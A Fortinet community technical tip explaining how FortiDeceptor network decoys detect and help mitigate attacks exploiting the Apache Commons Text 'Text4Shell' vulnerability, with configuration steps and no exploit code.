Help
FortiDeceptor
FortiDeceptor provides Deception-based Breach Protection to deceive, expose and eliminate external and internal threats.
mbensimon
Staff
Staff

Created on ‎10-24-2022 04:56 AM Edited on ‎10-31-2022 09:30 AM By Community Manager

Article Id 227639

Technical Tip: How to use FortiDeceptor to Detect & Mitigate the Apache Text4Shell Vulnerability

Description

This article describes how FortiDeceptor Decoys can detect activities related to the Apache Text4Shell Vulnerability CVE-2022-42889 & CVE-2022-33980 that can lead to a remote code execution vulnerability.

 

'Apache Commons Text is a low-level library for performing various text operations, such as escaping, calculating string differences, and substituting placeholders in the text with values looked up through interpolators.

Some of the available interpolators can trigger network access or code execution when using the string substitution feature.

This is intended, but it also means an application that includes user input in the string passed to the substitution without properly sanitizing it would allow an attacker to trigger those interpolators.'

 

Cyber Deception Against cyber attacks that try to leverage Text4Shell vulnerability

 

FortiDeceptor starts by deploying network decoys across the network segments, creating a fake environment that simulates the real network and assets.

The 'Text4Shell' exploit looks to attack the Apache web server, so network decoys like Ubuntu & CentOS with web server enabled will be deployed across several network locations such as Data Centers/ DMZ / Cloud (FortiDeceptor uses APACHE software on Linux decoys).
Scope

The Deception Decoys & lures against the 'Text4Shell' vulnerability attacks can be used in FortiDeceptor V.3.3 and above.
Solution

Cyber Deception Against 'Text4Shell' attacks:

 

1) Configure network segments under the 'Deployment Network' section that FortiDeceptor will use to deploy network decoys (due to the nature of the attack, verify that is covering the Data Center/ DMZ / Cloud segments where WEB servers are located).

 

2) Deploy network Linux Decoys (Linux with WEB enabled) across the Data Center/ DMZ / Cloud segments network VLANs segments that are configured under the 'Deployment Network' section.

 

3) Once a threat actor or malware tries to penetrate a decoy with a web server, Fortideceptor will trigger a real-time alert.

 

4) FortiDeceptor will leverage the Fortinet Fabric or other third parties tools to execute a threat mitigation response to isolate the threat.

 

FortiDeceptor is Part of the Fortinet Security Fabric:

 

FortiDeceptor is natively integrated with FortiGate, FortiNAC, FortiSIEM, FortiAnalyzer, FortiSOAR, FortiEDR, and other Fabric solutions (third-party tools) to automate the mitigation response based on attack detection.
309
0 Kudos
Submit Article Idea
Broad. Integrated. Automated.

The Fortinet Security Fabric brings together the concepts of convergence and consolidation to provide comprehensive cybersecurity protection for all users, devices, and applications and across all network edges.

Social Media
Security Research
Company
News & Articles
Contact Us

Copyright 2024 Fortinet, Inc. All Rights Reserved.